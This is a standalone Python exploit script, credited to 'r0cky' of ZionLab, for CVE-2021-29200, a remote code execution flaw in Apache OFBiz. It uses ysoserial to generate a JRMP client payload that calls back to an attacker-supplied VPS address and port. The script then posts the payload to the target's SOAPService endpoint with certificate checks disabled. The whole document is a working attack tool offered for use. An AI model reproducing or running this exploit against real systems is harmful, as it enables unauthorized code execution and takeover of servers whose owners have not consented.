#!/usr/bin/env python # -*- coding: utf-8 -*- """ @Author: r0cky @Time: 2021/3/24-15:09 """ import subprocess import sys from urllib.parse import urlparse import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def banner(): print(""" =================================================== ____ ______ ____ _ ________ _______ / __ \| ____| _ \(_) | ____\ \ / / __ \ | | | | |__ | |_) |_ ____ | |__ \ V /| |__) | | | | | __| | _ <| |_ / | __| > < | ___/ | |__| | | | |_) | |/ / | |____ / . \| | \____/|_| |____/|_/___| |______/_/ \_\_| CVE-2021-29200 Powered by r0cky Team ZionLab =================================================== """) def exp(url, vps_ip, vps_port): popen = subprocess.Popen(['java', '-jar', 'ysoserial-stub.jar', "JRMPStubClient", "{}:{}".format(vps_ip, vps_port)], stdout=subprocess.PIPE) payload = popen.stdout.read() if len(payload) == 0: print("请在当前脚本目录放置ysoserial.jar!") exit(-1) post_data = payload.hex().upper() print("[+] Payload:", post_data) data = """

{}

""".format(post_data) print("[+] payload sending...") r = requests.post(url, data=data, headers=headers, verify=False) if r.status_code == 200: print("[+] send payload success.") print() print("[END] Apache OFBiz RCE Done.") else: print("[-] send payload failed.") print() print("[END] Apache OFBiz RCE failed.") headers={"Content-Type": "text/xml"} if __name__ == '__main__': banner() try: target = sys.argv[1] vps_ip = sys.argv[2] vps_port = sys.argv[3] # target = "https://192.168.80.136:8443" # vps_ip = "10.20.28.16" # vps_port = "9999" up = urlparse(target) target = up.scheme + "://" + up.netloc url = "{}/webtools/control/SOAPService".format(target) exp(url, vps_ip, vps_port) except: print("Example: \n\tpython3 " + sys.argv[0] + " \n")